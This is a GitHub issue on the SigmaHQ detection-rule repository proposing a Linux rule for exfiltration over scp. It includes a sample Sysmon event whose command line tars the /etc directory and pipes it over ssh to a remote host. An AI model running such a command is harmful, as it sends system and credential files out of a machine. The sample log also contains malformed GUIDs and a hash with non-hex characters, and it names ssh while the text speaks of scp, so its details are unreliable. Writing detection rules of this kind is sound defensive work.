sigma icon indicating copy to clipboard operation
sigma copied to clipboard

Published 20 hours ago verified publisher icon SigmaHQ

Exfiltration Over Alternative Protocol - Linux

Open CheraghiMilad opened this issue 4 months ago • 5 comments

When examining the Exfiltration Over Alternative Protocol technique, an attacker can use the scp command in Linux to dump OS credentials. According to the log generated by Sysmon for Linux, the following log entries are produced when the scp command is executed.

sample sysmon for linux log: Oct 6 18:33:59 ubuntu sysmon: <Event><System><Provider Name="Linux-Sysmon" Guid="{ff032593-a8d3-4f13-b0d6-01fc615a0f97}"/><EventID>1</EventID><Version>5</Version><Level>4</Level><Task>1</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime="2024-10-06T15:03:59.774949000Z"/><EventRecordID>4341</EventRecordID><Correlation/><Execution ProcessID="11362" ThreadID="11362"/><Channel>Linux-Sysmon/Operational</Channel><Computer>ubuntu</Computer><Security UserId="0"/></System><EventData><Data Name="RuleName">-</Data><Data Name="UtcTime">2024-10-06 15:03:59.763</Data><Data Name="ProcessGuid">{7855304e-m6df-6702-f11a-ft3e65590000}</Data><Data Name="ProcessId">13439</Data><Data Name="Image">/usr/bin/ssh</Data><Data Name="FileVersion">-</Data><Data Name="Description">-</Data><Data Name="Product">-</Data><Data Name="Company">-</Data><Data Name="OriginalFileName">-</Data><Data Name="CommandLine">ssh target.example.com (cd /etc && tar -zcvf - *)</Data><Data Name="CurrentDirectory">/tmp</Data><Data Name="User">root</Data><Data Name="LogonGuid">{78a6704r-0000-0000-0000-000000000000}</Data><Data Name="LogonId">0</Data><Data Name="TerminalSessionId">4294967295</Data><Data Name="IntegrityLevel">no level</Data><Data Name="Hashes">SHA256=950fcc37f70c18932935e0e1b1cavfsdsbfd278c60f1cfeb2d4ceb9d642073ff</Data><Data Name="ParentProcessGuid">{78a6384e-a6df-6702-9569-a9a24d590000}</Data><Data Name="ParentProcessId">13437</Data><Data Name="ParentImage">/usr/bin/dash</Data><Data Name="ParentCommandLine">sh</Data><Data Name="ParentUser">root</Data></EventData></Event>

Based on the log details, it can be assessed that if the image equals scp and the command lines include details from Linux compressors, it can be monitored as a specific rule.

Summary of the Pull Request

Changelog

Example Log Event

Fixed Issues

SigmaHQ Rule Creation Conventions

  • If your PR adds new rules, please consider following and applying these conventions

CheraghiMilad avatar Oct 06 '24 17:10 CheraghiMilad